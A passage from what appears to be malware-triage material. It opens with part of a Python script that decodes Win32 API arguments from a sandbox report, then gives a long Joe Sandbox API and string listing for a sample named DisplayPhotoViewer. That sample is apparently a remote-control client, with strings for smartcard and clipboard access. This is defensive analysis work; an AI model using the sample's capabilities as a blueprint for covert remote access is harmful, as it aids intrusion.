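       0x10: "SWP_NOACTIVATE", 0x20: "SWP_FRAMECHANGED", 0x40: "SWP_SHOWWINDOW",
       0x80: "SWP_HIDEWINDOW"}

# api -> {argument index: (table, is_bitmask)}; only these APIs are decoded.
DECODERS = {
    "CreateFileA": {1: (GENERIC, True), 2: (SHARE, True), 4: (DISPOSITION, False), 5: (FILE_ATTR, True)},
    "GetDeviceCaps": {1: (DEVCAPS, False)},
    "shutdown": {1: (SD_HOW, False)},
    "DeferWindowPos": {7: (SWP, True)},
}
DECODERS["CreateFileW"] = DECODERS["CreateFileA"]


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall: str = ""            # callee address when the line is "Part of subcall function"
    decoded: dict = field(default_factory=dict)   # argument index -> symbolic name(s)


def decode_mask(value: int, table: dict) -> str:
    """Render a bitmask as OR-ed symbolic names; bits not in the table stay hexadecimal."""
    names, rest = [], value
    for bit, name in table.items():
        if value & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"


def decode_call(call: Call) -> Call:
    """Fill call.decoded for every argument the DECODERS table knows about."""
    for idx, (table, is_mask) in DECODERS.get(call.api, {}).items():
        # Unknown stack slots are printed as "?" by the report; skip those.
        if idx < len(call.args) and re.fullmatch(r"[0-9A-Fa-f]{1,8}", call.args[idx]):
            value = int(call.args[idx], 16)
            call.decoded[idx] = decode_mask(value, table) if is_mask else table.get(value, hex(value))
    return call


def parse(listing: str) -> list:
    """Turn listing text into Call records; headings such as 'APIs' are ignored."""
    calls = []
    for line in listing.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(decode_call(Call(m["api"], m["mod"], args, m["ref"], m["sub"] or "")))
    return calls


def findings(calls: list) -> list:
    """Triage hints a reviewer would pull out of one function's API list."""
    out = []
    if any(c.api == "GetProcAddress" for c in calls):
        # Export names appear as string arguments next to the GetModuleHandle call.
        names = [a for c in calls if c.api.startswith("GetModuleHandle") for a in c.args
                 if re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]{3,}", a)]
        out.append("resolves exports at runtime via GetProcAddress: " + ", ".join(names))
    for c in calls:
        if c.api.startswith("CreateFile") and "GENERIC_WRITE" in c.decoded.get(1, "") \
                and c.decoded.get(4) == "CREATE_ALWAYS":
            out.append(f"creates or overwrites a file (ref {c.ref})")
    return out
```

Run on the sample, the CreateFileA call decodes to GENERIC_WRITE, no sharing, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL; the DeferWindowPos flags 0x17 decode to SWP_NOSIZE|SWP_NOMOVE|SWP_NOZORDER|SWP_NOACTIVATE; and the GetDeviceCaps index 0x26 decodes to RASTERCAPS, which is what palette-capability checks such as the WPALETTE.C function query. Extending the DECODERS table is the only change needed to cover further APIs from the same report.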
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock_fseek$_free_malloc_memset
                                                                                                    • String ID: PCIR
                                                                                                    • API String ID: 2419779768-1011558323
                                                                                                    • Opcode ID: 28ce7027b2f0b1a0428cb0109600466e3bd925d5d5d171087073955f09152b5b
                                                                                                    • Instruction ID: baad75821f58102a79a5e411f0d5ec96f38712958703bea0f707118dc0e7c982
                                                                                                    • Opcode Fuzzy Hash: 28ce7027b2f0b1a0428cb0109600466e3bd925d5d5d171087073955f09152b5b
                                                                                                    • Instruction Fuzzy Hash: B141E675E017059BEB50CFA5CC41BDEBBBAEF81708F204069FC19AB340EA71A941C795
                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?,?,00000001), ref: 11067450
                                                                                                    • wsprintfA.USER32 ref: 110674A1
                                                                                                    • wvsprintfA.USER32(00000000,00000000,?), ref: 110674D0
                                                                                                    • _fputs.LIBCMT ref: 11067535
                                                                                                      • Part of subcall function 1113B0A0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?), ref: 1113B0C7
                                                                                                      • Part of subcall function 111592B7: __fsopen.LIBCMT ref: 111592C4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandLocalStringsTime__fsopen_fputswsprintfwvsprintf
                                                                                                    • String ID: %02d-%s-%02d %02d:%02d:%02d $..\ctl32\Connect.cpp$MODEM.LOG$_tcslen (buf) < _tsizeof (buf)
                                                                                                    • API String ID: 2115059068-1537580878
                                                                                                    • Opcode ID: 845d9c894ba22a103bb5a20bd0c1c5e066b2274dbbecf200f58031c5f5ba18e2
                                                                                                    • Instruction ID: 5bf6e2984e430cc436706e2fe9c3bf79207d30e77b5f730aad0b94a4cfd6cf5b
                                                                                                    • Opcode Fuzzy Hash: 845d9c894ba22a103bb5a20bd0c1c5e066b2274dbbecf200f58031c5f5ba18e2
                                                                                                    • Instruction Fuzzy Hash: 614127B590051D9ACB55CF64CC84FFEB7B8AF44308F0085E9ED195B145FA309AC9CBA5
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:, xrefs: 1113D37D
                                                                                                    • %02X , xrefs: 1113D3C2
                                                                                                    • Callstack:, xrefs: 1113D3DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$CurrentReadThread
                                                                                                    • String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:
                                                                                                    • API String ID: 477357799-160799177
                                                                                                    • Opcode ID: 85f64b8c36865edf5830f15241233646391ebd7f2dc4060bfb2681933bb9f207
                                                                                                    • Instruction ID: d74afcb4cdfaf82b80e113ab981f38a864310c22b470073b0366c7627867f552
                                                                                                    • Opcode Fuzzy Hash: 85f64b8c36865edf5830f15241233646391ebd7f2dc4060bfb2681933bb9f207
                                                                                                    • Instruction Fuzzy Hash: 7A411AB2610705AFDB54CFA8DC80F9BB7E9AF88315F048518F95EC7245EA70B914CB61
                                                                                                    APIs
                                                                                                    • SetPropA.USER32(?,?), ref: 1101546F
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                      • Part of subcall function 11015190: BeginPaint.USER32(?,?), ref: 110151BF
                                                                                                      • Part of subcall function 11015190: GetWindowRect.USER32(?,?), ref: 110151D7
                                                                                                      • Part of subcall function 11015190: _memset.LIBCMT ref: 110151E5
                                                                                                      • Part of subcall function 11015190: CreateFontIndirectA.GDI32(?), ref: 11015201
                                                                                                      • Part of subcall function 11015190: SelectObject.GDI32(00000000,00000000), ref: 11015215
                                                                                                      • Part of subcall function 11015190: SetBkMode.GDI32(00000000,00000001), ref: 11015220
                                                                                                      • Part of subcall function 11015190: BeginPath.GDI32(00000000), ref: 1101522D
                                                                                                      • Part of subcall function 11015190: TextOutA.GDI32(00000000,00000000,00000000), ref: 11015250
                                                                                                      • Part of subcall function 11015190: EndPath.GDI32(00000000), ref: 11015257
                                                                                                      • Part of subcall function 11015190: PathToRegion.GDI32(00000000), ref: 1101525E
                                                                                                      • Part of subcall function 11015190: CreateSolidBrush.GDI32(?), ref: 11015270
                                                                                                      • Part of subcall function 11015190: CreateSolidBrush.GDI32(?), ref: 11015286
                                                                                                      • Part of subcall function 11015190: CreatePen.GDI32(00000000,00000002,?), ref: 110152A0
                                                                                                      • Part of subcall function 11015190: SelectObject.GDI32(00000000,00000000), ref: 110152AE
                                                                                                      • Part of subcall function 11015190: SelectObject.GDI32(00000000,?), ref: 110152BE
                                                                                                      • Part of subcall function 11015190: GetRgnBox.GDI32(00000000,?), ref: 110152CB
                                                                                                    • GetPropA.USER32(?), ref: 1101547E
                                                                                                    • wsprintfA.USER32 ref: 110154B3
                                                                                                    • RemovePropA.USER32(?), ref: 110154E8
                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 11015511
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$ObjectPathPropSelect$BeginBrushSolidWindowwsprintf$ErrorExitFontIndirectLastMessageModePaintProcProcessRectRegionRemoveText_memset
                                                                                                    • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                    • API String ID: 1924375018-841114059
                                                                                                    • Opcode ID: 5ae669996dbfa26390cfc99d270bb996e83ff5afed2cde543b7f0d0b1e9f13e0
                                                                                                    • Instruction ID: ed625737e6ef24f8e59a1769ca8d497c9e3d01fe69ebdc186851423fee26edd3
                                                                                                    • Opcode Fuzzy Hash: 5ae669996dbfa26390cfc99d270bb996e83ff5afed2cde543b7f0d0b1e9f13e0
                                                                                                    • Instruction Fuzzy Hash: AB31B875F01129ABDB11DF94DC84FBEB3A9EF86309F0480AAF9069F144EB3599408B65
                                                                                                    APIs
                                                                                                      • Part of subcall function 11106970: timeGetTime.WINMM(00000000,11039AC2,?,?,?,?,?,?,?,218EC38C), ref: 1110697D
                                                                                                      • Part of subcall function 110F1300: _memset.LIBCMT ref: 110F1325
                                                                                                      • Part of subcall function 110F1300: GetACP.KERNEL32(0BA6C1B8,DBCS,Charset,932=*128,?,?,00000000), ref: 110F138E
                                                                                                    • Sleep.KERNEL32(00000032,?,?,?,?,?,?,?,?,218EC38C), ref: 11039AE2
                                                                                                    • GetDC.USER32(00000000), ref: 11039AEA
                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 11039AF7
                                                                                                    • SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 11039B03
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 11039B0C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Pixel$ReleaseSleepTime_memsettime
                                                                                                    • String ID: DoFlushOptimal, maxcb=%d, cb=%d, gcb=%d$View$limitcolorbits
                                                                                                    • API String ID: 686385934-1413253680
                                                                                                    • Opcode ID: 3437eefcd570305c20c49a421c9779e5e3ac154504bdb957b87f42db021d8326
                                                                                                    • Instruction ID: c486e184c930b8563c288e1e3d51893551782359500e9b86c56fcb919e802826
                                                                                                    • Opcode Fuzzy Hash: 3437eefcd570305c20c49a421c9779e5e3ac154504bdb957b87f42db021d8326
                                                                                                    • Instruction Fuzzy Hash: CC418431A506169FEF15DBE4DD85BFEB3A5EB84309F10016DE916AB284EB30A901C791
                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(00000000,00000000), ref: 1115358D
                                                                                                    • PostMessageA.USER32(00000000,00000500,00000000,00000000), ref: 111535B0
                                                                                                    • IsWindow.USER32(00000000), ref: 111535BD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$FindMessagePost
                                                                                                    • String ID: MMPlayer$MasterClass$MasterWindow$PCIVideoMaster$PCIVideoMaster32
                                                                                                    • API String ID: 872083800-2187584920
                                                                                                    • Opcode ID: 5599a78da71cf405a67cd602d2417bf8184dae4be483e90d5e13cb5ccc7ca856
                                                                                                    • Instruction ID: f3ecdafcd31ea9de1ec66b7e81947ca60c64aab85bc8da93d885e86bf37f5535
                                                                                                    • Opcode Fuzzy Hash: 5599a78da71cf405a67cd602d2417bf8184dae4be483e90d5e13cb5ccc7ca856
                                                                                                    • Instruction Fuzzy Hash: CA419F75228B519BD755CF7AC880F96FBB8BB4A708F00C52AE9A9C7244DA30F410CB64
APIs
• GetLastError.KERNEL32 ref: 1103F59C
• _malloc.LIBCMT ref: 1103F5BA
  • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
  • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
  • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
• GetLastError.KERNEL32 ref: 1103F62C
• _free.LIBCMT ref: 1103F641
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
• Read %u bytes from smartcard device, xrefs: 1103F60F
• CLTCONN.CPP, xrefs: 1103F5F9
• Error %d reading from smartcard device, xrefs: 1103F633
• transferred == datalen, xrefs: 1103F5FE
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: ErrorLast$AllocateExitHeapMessageProcess_free_mallocwsprintf
• String ID: CLTCONN.CPP$Error %d reading from smartcard device$Read %u bytes from smartcard device$transferred == datalen
• API String ID: 492257515-1619960733
• Opcode ID: 8fb94993129b24d6adcf9b7a90fe36b4575e99e24564755878cd6d94685b1e25
• Instruction ID: a1a09018b4aab67e0b2f0facd33879a38239b833620da61a13f5f99a261d5919
• Opcode Fuzzy Hash: 8fb94993129b24d6adcf9b7a90fe36b4575e99e24564755878cd6d94685b1e25
• Instruction Fuzzy Hash: BD31B0B5E0451AAFCB00DFA9DC81EAFF7B9EF88715F104559E815A3390DB316904CBA2
APIs
• GetMenuItemCount.USER32(?), ref: 1100514E
• _memset.LIBCMT ref: 11005170
• GetMenuItemID.USER32(?,00000000), ref: 11005184
• CheckMenuItem.USER32(?,00000000,00000000), ref: 110051E1
• EnableMenuItem.USER32(?,00000000,00000000), ref: 110051F7
• GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005218
• SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005244
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: ItemMenu$Info$CheckCountEnable_memset
• String ID: 0
• API String ID: 2755257978-4108050209
• Opcode ID: b7aba7707cf57509f01a70daa624546ebded703fcd2bc299b0f15846ab8778a8
• Instruction ID: 8a6e5718aec271412b730c5e27d6c1082ab1519c18c41815893aa6239760ca5e
• Opcode Fuzzy Hash: b7aba7707cf57509f01a70daa624546ebded703fcd2bc299b0f15846ab8778a8
• Instruction Fuzzy Hash: 4F319270D41219ABEB05DF64D888BDEBBFCEF46398F008169FD51EA240E7759A44CB60
APIs
• _malloc.LIBCMT ref: 1103136A
• _memset.LIBCMT ref: 110313A1
• RegisterClipboardFormatA.USER32(?), ref: 110313C9
• GetLastError.KERNEL32 ref: 110313D4
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
• _memmove.LIBCMT ref: 1103141E
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
• String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
• API String ID: 2414640225-228067302
• Opcode ID: 2959f8fbcfe5e24fd2502ca24c64c28181f9d0d5cd43581e415b00975f8fb4b1
• Instruction ID: 8b4703d0d3723e4d9affe8cec0491c3a2d4b7c7213c53c652b09706a8ae01ea2
• Opcode Fuzzy Hash: 2959f8fbcfe5e24fd2502ca24c64c28181f9d0d5cd43581e415b00975f8fb4b1
• Instruction Fuzzy Hash: 0C31AB78A10706ABD750DF24D881B6AF3B4FF88708F50C55CEA698B341EB30EA54CB90
APIs
• GetMenu.USER32(00000000), ref: 110B54E8
• EnableWindow.USER32(00000000,00000000), ref: 110B5523
• EnableWindow.USER32(00000000,00000000), ref: 110B554D
• EnableWindow.USER32(00000000,00000000), ref: 110B557D
• EnableWindow.USER32(?,00000000), ref: 110B5584
• EnableMenuItem.USER32(110BAA1C,00000000,00000002), ref: 110B559E
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
